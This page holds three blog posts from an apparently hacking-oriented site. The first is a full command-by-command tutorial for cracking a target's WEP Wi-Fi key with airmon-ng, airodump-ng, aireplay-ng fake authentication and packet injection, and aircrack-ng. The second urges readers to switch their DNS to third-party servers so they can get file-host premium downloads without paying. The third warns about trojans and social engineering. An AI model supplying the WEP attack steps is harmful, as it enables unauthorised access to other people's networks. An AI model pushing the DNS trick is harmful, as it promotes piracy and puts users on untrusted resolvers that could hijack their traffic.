Cracking The WEP Key With Backtrack 5

As announced before we would be writing related to wifi attacks and security, This post is the second part of our series on wifi attacks and Security, In the first part we discussed about various terminologies related to wifi attacks and security and discussed couple of attacks. This post will also show you how one can easily crack WEP keys in no time.


Security Issues With WEP


WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001, WEP protocol itself has some weakness which allows the attackers to crack them in no time. The biggest flaw probably in a WEP key is that it supports only 40bit encryption which means that there are 16million possibilities only.

For more information on WEP flaws, kindly read the WEP flaws section here.

Requirements :-

Here is what you would require to crack a WEP key:

1. Backtrack or any other Linux distro with aircrack-ng installed 

2. A Wifi adapter capable of injecting packets , For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack

You can find compatible wifi card lists here.

Procedure :-

First Login to your Backtrack / Linux distro and plug in your Wifi adpter , Open a new konsole and type in the following commands 

ifconfig wlan0 up

where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type in " iwconfig ".


Putting your WiFi Adapter on Monitor Mode

To begin, you’ll need to first put your wireless adapter into monitor mode , Monitor mode is the mode whereby your card can listen to every packet in the air , You can put your card into monitor mode by typing in the following commands 

airmon-ng start (your interface)

Example :- airmon-ng start wlan0

Now a new interface mon0 will be created , You can see the new interface is in monitor mode by entering "iwconfig mon0" as shown

Finding a suitable Target

After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command

airodump-ng mon0

Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type ,

Now look out for a wep protected network In my case i’ll take “linksys “ as my target for rest of the tutorial

Attacking The Target

Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands

airodump-ng mon0 --bssid -c (channel ) -w (file name to save )

As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "RHAWEP"

airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP

Using Aireplay to Speed up the cracking

Now you’ll have to capture at least 20,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack you'll have do a Fake authentication (connect) with the AP ,then you'll have to generate and inject packets. This can be done very easily by entering the following commands 

aireplay-ng - 1 3 -a (bssid of the target ) (interface) 

In my case i enter the following commands 

aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0 


After doing a fake authentication ,now its time to generate and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands

aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)

In my case i enter
aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

If this step was successful you'll see Lot of data packets in the airodump capture as shown

Wait till it reaches 20000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the packets less the time to crack .Once you’ve captured enough number of packets, close all the process's by clicking the into mark which is there on the terminal

Cracking WEP key using Aircrack

Now its time crack the WEP key from the captured data, Enter the following commands in a new konsole to crack the WEP key

aircrack-ng (name of the file )

In my case i enter 
aircrack-ng RHAWEP-0.1-cap

With in a few minutes Aircrak will crack the WEP key as shown

Once the crack is successful you will be left with the KEY! Remove the colons from the output and you’ll have your WEP Key.

Hope You Enjoyed this tutorial ,For further Doubts and clarifications please pass your comments

Read More

Free Hotfile, Fileserve, Megaupload Premium Link Generator

Free Hotfile, Fileserve, Megaupload Premium Link Generator

1

All of us have, at one point or another, used major file hosting websites like Megaupload, Hotfile and Rapidshare. The sweetest part and the reason why we wait for hours on end to download our required files from these links is 'cause we don't have to cough up a dime while doing so. Buying them is a far worse idea as breaking rules is and always will be our kinda deal!
Free Fileserve, Filesonic Premium Link Generator


 But there's a catch (yeah, all good things come at a price). Even if you do manage to wait for your download link to appear and somehow you manage to start your download, the speed is gonna be like one of those days when you are late for work and the old lady driver in the car up front just won't moooove! Yeah, you know what I'm talking about. I'm gonna tell you a way out.. Break all the rules and make a run for it!

Getting back to the topic, file hosting websites lag speed, restrict parallel downloading and make you wait before they throw a bone at you, that is if you a FREE MEMBER. These sites require pocket change if you want to download files without any restrictions and party all day long with free software downloads. 

But, as always, we have a solution for you. Now, you can download files all day long with a Premium account to satisfy all your software hunger and that too, without paying a dime (Yeah, you heard me). Simply, useFree Fileserve, Filesonic and Megaupload Premium Link Generator, copy and paste a Megaupload file URL and instantly download your file.

Free Fileserve, Filesonic Premium Link Generation technique

Follow the instructions below to break free and enjoy unlimited downloads for a day:

Step 1: Go to DebriDNS and register for an account. Verify and login to your DebriDNS account.



Step 2: Configure your DNS settings by going to your Control Panel -> Networking and Sharing Center -> Manage Network Connections -> “Your Connection name”, for e.g Local Area Connection.


Step 3: Right click on it and select Properties.

Step 4: Double click on IPV4.


Step 5: Click “Use the following DNS server addresses” and enter the following DNS addresses:
Preferred DNS Server: 85.17.255.198
Alternative DNS Server: 46.19.33.120

Click OK and Exit.

Step 6: Restart your browser and say a prayer 'cause you have entered the rabbit hole!
As for downloading a file, all you have to do it:

Step 1: Open Megaupload and you will find yourself logged in as a a Premium User (Huraaah!)

Step 2: Hit on Premium and enjooooyyyy!


If this Free Fileserve, Filesonic Premium Link Generation technique did not work for you, Kindly comment and let us know.

PS: This works for Hotfile too!

Read More

Your PC Might Be Vulnerable To Security Threats

"The next time a website says to download new software to view a movie or fix a problem, think twice. There's a pretty good chance that the program is malicious," says Microsoft.


In this day and age, everything from our cellphones to our toilets have security measures that are meant to protect us from catching a virus and compromising our system in the process. Computers, browsers and software systems are now designed to protect us from malicious downloads, viruses and bugs, and more and more effort (and cash) is put into making sure that it remains that way. Even Obama is on the brink of sanity throwing up orders at his line of officials to make certain that the 'WikiLeaks' scenario doesn't happen again.

But despite all the effort, there is still one flaw that hasn't yet been covered by our very own geniuses (although, i would have to blame the not-so-genius PC users for it). We are still very vulnerable to security breeches because regardless of warnings popping up on Internet Explorer, about 5 percent of the users choose to ignore these alerts and download potentially untrustworthy softwares containing Trojan horse programs (we have all done it at one time or another).

Evolution has taken another step forward and hackers are now relying completely on ignorance of users like us. Without a hint of what we are up against, we choose to download unknown softwares from unknown sites. We do not realize that these softwares, where they can be very helpful, can also compromise the information on our computer.

The process of spreading these Trojan horse programs is a very simple one. Entice the person using the computer to download a program and 'hack and sack' them! It's called Social Engineering. "The attackers have figured out that it's not that hard to get users to download Trojans," says Alex Stamos, a founding partner with Isec Partners, a security consultancy company.

Social Engineering is how the Koobface virus spreads on Facebook, Web pages are hacked,fake antivirus warnings designed to look like messages from the operating system are popped up and malicious websites that look like they have interesting stories or videos are linked to search engines.

According to Joshua Talbot, a manager with Symantec Security Response, "The attackers are very opportunistic, and they latch onto any event that might be used to lure people."

We will keep you updated on the topic but as for now please, brush up your security techniques and steer clear of unidentified and suspicious softwares. I know it's gotta be tough by man up!! 

Read More